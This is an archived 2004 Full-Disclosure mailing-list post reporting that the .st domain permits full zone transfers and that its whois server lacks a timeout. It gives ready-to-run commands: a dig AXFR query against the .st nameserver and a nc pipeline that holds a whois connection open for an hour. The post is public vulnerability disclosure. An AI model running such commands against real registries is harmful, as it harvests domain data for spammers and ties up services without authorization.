[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]
[Full-Disclosure] Re: zone transfers, a spammer's dream?
- To: full-disclosure@xxxxxxxxxxxxxxxx
- Subject: [Full-Disclosure] Re: zone transfers, a spammer's dream?
- From: "Troubles Troubles" <troubles___@xxxxxxxxxxx>
- Date: Fri, 17 Dec 2004 16:34:38 +0000
== the fucking bugtraq moderators don't let me post this! ==
.st has this bug too. you can transfer the whole domain. their whois server
also doesn't have any time-out!
try this:
dig @a.root-servers.net. st. ns
dig @auth61.ns.uu.net. st. axfr
(sleep 3600; perl -e 'print "karlung-liberation-front.st\015\012";') | nc
whois.nic.st. 43
found by
troubles
_________________________________________________________________
Hitta rätt på nätet med MSN Sök http://search.msn.se/
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html